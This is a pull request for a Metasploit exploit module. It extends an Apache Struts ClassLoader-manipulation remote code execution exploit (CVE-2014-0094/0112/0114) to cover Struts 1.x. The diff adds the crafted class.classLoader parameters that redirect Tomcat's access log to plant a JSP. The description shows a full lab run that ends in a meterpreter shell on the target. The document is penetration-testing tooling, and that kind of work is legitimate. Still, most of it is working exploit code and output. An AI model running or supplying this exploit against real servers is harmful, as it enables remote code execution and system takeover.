### PR TITLE
Add Struts 1 support for Apache Struts ClassLoader manipulation vulnerability

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -33,8 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2014-0094'],
           ['CVE', '2014-0112'],
+          ['CVE', '2014-0114'],
           ['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
-          ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
+          ['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
+          ['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
         ],
       'Platform'       => %w{ linux win },
       'Payload'        =>

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -69,7 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
+          OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
         ], self.class)
   end
 
@@ -101,15 +102,22 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def modify_class_loader(opts)
+
+    cl_prefix =
+      case datastore['STRUTS_VERSION']
+      when '1.x' then "class.classLoader"
+      when '2.x' then "class['classLoader']"
+      end
+
     res = send_request_cgi({
       'uri'     => normalize_uri(target_uri.path.to_s),
       'version' => '1.1',
       'method'  => 'GET',
       'vars_get' => {
-        "class['classLoader'].resources.context.parent.pipeline.first.directory"      => opts[:directory],
-        "class['classLoader'].resources.context.parent.pipeline.first.prefix"         => opts[:prefix],
-        "class['classLoader'].resources.context.parent.pipeline.first.suffix"         => opts[:suffix],
-        "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
+        "#{cl_prefix}.resources.context.parent.pipeline.first.directory"      => opts[:directory],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix"         => opts[:prefix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix"         => opts[:suffix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
       }
     })
 

--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
       'Description'    => %q{
-        This module exploits a remote command execution vulnerability in Apache Struts
-        versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows
-        access to 'class' parameter that is directly mapped to getClass() method and
-        allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary
-        Java code via crafted parameters.
+        This module exploits a remote command execution vulnerability in Apache Struts versions
+        1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
+        the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
+        to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
+        mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
+        allow remote attackers to execute arbitrary Java code via crafted parameters.
       },
       'Author'         =>
         [


### PR DESCRIPTION
Added support for Struts 1 as described at CVE-2014-0114. 

In this case only actions using ActionForms are affected, as detailed at http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VMtgmGRwtgg

Testing env:
- Ubuntu Server 14.04.1 64 bits (3.13.0-32-generic #57-Ubuntu SMP)
- Tomcat 8.0.18
- Java version "1.7.0_76" & Java version "1.8.0_31"
- Git rev: 7789d5d
- Struts version: 1.3.10
- Struts 1 application with ActionForms

Test:

```
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting               Required  Description
   ----            ---------------               --------  -----------
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194                yes       The target address
   RPORT           8080                          yes       The target port
   STRUTS_VERSION  1.x                           yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /struts1-helloworld/Login.do  yes       The path to a struts application action
   VHOST                                         no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         172.16.218.194   no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[*] 172.16.218.194:8080 - Countdown 5...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.218.194
[*] Meterpreter session 1 opened (172.16.218.1:57404 -> 172.16.218.194:4444) at 2015-01-31 00:38:55 +0100
[+] Deleted jtaRE469.jsp
[+] Deleted lRE4

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > 
```
